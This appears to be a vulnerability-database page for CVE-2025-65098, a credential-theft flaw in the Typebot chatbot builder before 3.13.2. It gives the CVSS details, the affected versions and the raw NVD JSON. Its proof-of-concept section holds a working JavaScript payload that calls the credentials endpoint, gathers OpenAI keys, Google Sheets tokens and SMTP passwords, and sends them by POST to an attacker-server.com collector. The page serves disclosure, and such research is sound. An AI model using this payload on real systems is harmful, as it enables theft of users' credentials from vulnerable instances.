Security Vulnerability Report
中文
CVE-2025-65098 CVSS 7.4 HIGH

CVE-2025-65098

Published: 2026-01-22 15:16:48
Last Modified: 2026-01-30 14:32:00
Source: [email protected]

Description

Typebot is an open-source chatbot builder. In versions prior to 3.13.2, client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking "Run", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership. Version 3.13.2 fixes the issue.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:typebot:typebot:*:*:*:*:*:-:*:* - VULNERABLE
Typebot < 3.13.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-65098 Typebot Credential Theft PoC // This PoC demonstrates the credential theft vulnerability in Typebot < 3.13.2 // Malicious Typebot JavaScript payload const maliciousPayload = ` <script> // Exfiltrate all stored credentials async function stealCredentials() { try { // Call the vulnerable API endpoint const response = await fetch('/api/trpc/credentials.getCredentials', { method: 'POST', headers: { 'Content-Type': 'application/json', }, body: JSON.stringify({ json: { typebotId: '' } }) }); const data = await response.json(); const credentials = data.result?.data?.json || []; // Extract sensitive information const stolenData = { openai_keys: [], google_sheets_tokens: [], smtp_passwords: [] }; credentials.forEach(cred => { if (cred.type === 'openai') { stolenData.openai_keys.push({ name: cred.name, apiKey: cred.data.apiKey }); } else if (cred.type === 'googlesheets') { stolenData.google_sheets_tokens.push({ name: cred.name, token: cred.data.accessToken }); } else if (cred.type === 'smtp') { stolenData.smtp_passwords.push({ name: cred.name, host: cred.data.host, port: cred.data.port, username: cred.data.username, password: cred.data.password }); } }); // Exfiltrate to attacker-controlled server fetch('https://attacker-server.com/collect', { method: 'POST', body: JSON.stringify(stolenData) }); } catch (error) { console.error('Credential theft failed:', error); } } // Execute when victim clicks "Run" stealCredentials(); </script> `; // Attack vector: Embed this payload in a malicious typebot // When victims preview/run this typebot, credentials are stolen console.log('Malicious payload ready for embedding in Typebot');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65098", "sourceIdentifier": "[email protected]", "published": "2026-01-22T15:16:48.370", "lastModified": "2026-01-30T14:32:00.327", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Typebot is an open-source chatbot builder. In versions prior to 3.13.2, client-side script execution in Typebot allows stealing all stored credentials from any user. When a victim previews a malicious typebot by clicking \"Run\", JavaScript executes in their browser and exfiltrates their OpenAI keys, Google Sheets tokens, and SMTP passwords. The `/api/trpc/credentials.getCredentials` endpoint returns plaintext API keys without verifying credential ownership. Version 3.13.2 fixes the issue."}, {"lang": "es", "value": "Typebot es un creador de chatbots de código abierto. En versiones anteriores a la 3.13.2, la ejecución de scripts del lado del cliente en Typebot permite robar todas las credenciales almacenadas de cualquier usuario. Cuando una víctima previsualiza un typebot malicioso al hacer clic en 'Run', JavaScript se ejecuta en su navegador y exfiltra sus claves de OpenAI, tokens de Google Sheets y contraseñas SMTP. El endpoint `/api/trpc/credentials.getCredentials` devuelve claves API en texto plano sin verificar la propiedad de las credenciales. La versión 3.13.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-284"}, {"lang": "en", "value": "CWE-311"}, {"lang": "en", "value": "CWE-522"}, {"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-862"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-522"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:typebot:typebot:*:*:*:*:*:-:*:*", "versionEndExcluding": "3.13.2", "matchCriteriaId": "C9C0CE68-9A17-446B-B206-5821B6DB884D"}]}]}], "references": [{"url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-4xc5-wfwc-jw47", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.